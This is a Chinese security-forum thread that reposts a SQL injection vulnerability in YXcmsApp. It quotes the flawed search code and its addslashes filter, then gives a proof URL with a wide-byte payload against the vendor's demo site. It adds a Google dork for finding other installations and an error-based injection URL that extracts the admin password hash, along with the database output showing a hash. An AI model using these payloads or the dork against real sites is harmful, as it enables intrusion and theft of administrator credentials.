查看: 13750|回复: 1

YXcmsApp 注入漏洞(转载)

[复制链接]
发表于 2014-3-21 23:10:10 | 显示全部楼层 |阅读模式
漏洞文件protected\apps\default\controller\indexController.php

关键代码

public function search()

        {

       if(empty($_GET['keywords'])||empty($_GET['type'])) $this->error('搜索条件不足~');

       $keywords=in(urldecode(trim($_GET['keywords'])));

       $type=in($_GET['type']);

       $listRows=10;//每页显示的信息条数,2n偶数

       $url=url('index/search',array('keywords'=>urlencode($keywords),'type'=>$type,'page'=>'{page}'));

         $where="ispass='1' AND (title like '%".$keywords."%' OR description like '%".$keywords."%')";




全局过滤代码

protected\include\lib\common.function.php

function in($data,$force=false){

        if(is_string($data)){

                $data=trim(htmlspecialchars($data));//防止被挂马,跨站攻击

                if(($force==true)||(!get_magic_quotes_gpc())) {

                   $data = addslashes($data);//防止sql注入

                }

                return  $data;

        } else if(is_array($data)) {

                foreach($data as $key=>$value){

                   $data[$key]=in($value,$force);

                }

                return $data;

        } else {

                return $data;

        }       

}


keywords 靠addslashes这个过滤,无语了
漏洞证明:
http://demo.yxcms.net/index.php?r=default/index/search&keywords=a%2527%C2%95%C2%8A&type=all



出错信息: MySQL Query Error

SQL: SELECT count(*) FROM yx_news WHERE ispass='1' AND (title like '%a'•Š%' OR description like '%a'•Š%')

错误详情: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '•Š%' OR description like '%a'•Š%')' at line 1

错误代码:1064






危害



google search



inurl:index.php?r=default/page



http://www.google.com.hk/#newwindow=1&q=inurl:index.php%3Fr%3Ddefault/page&safe=strict&start=90



用的也比较多了 算通用了吧。





其实很多地方引用这个过滤。。顺便送个爆hash exp



http://demo.yxcms.net/index.php?r=default%2Fextend%2Findex&id=100023%20AND%20%28SELECT%201660%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x716d667271%2C%28SELECT%20MID%28%28IFNULL%28CAST%28password%20AS%20CHAR%29%2C0x20%29%29%2C1%2C50%29%20FROM%20yx_admin%20WHERE%20username%3D0x61646d696e%20LIMIT%200%2C1%29%2C0x716e6e7371%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29




出错信息: MySQL Query Error

SQL: SELECT id,type,name,method,url,extendid FROM yx_sort WHERE id IN(100023 AND (SELECT 1660 FROM(SELECT COUNT(*),CONCAT(0x716d667271,(SELECT MID((IFNULL(CAST(password AS CHAR),0x20)),1,50) FROM yx_admin WHERE username=0x61646d696e LIMIT 0,1),0x716e6e7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)) ORDER BY deep

错误详情: Duplicate entry 'qmfrq44f76bda33900c7a9b984674f283fdafqnnsq1' for key 'group_key'

错误代码:1062
回复

使用道具 举报

发表于 2014-3-22 23:24:46 | 显示全部楼层
这是在刷清理的节奏啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-3-7 08:23 , Processed in 0.037153 second(s), 11 queries , Gzip On, MemCache On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部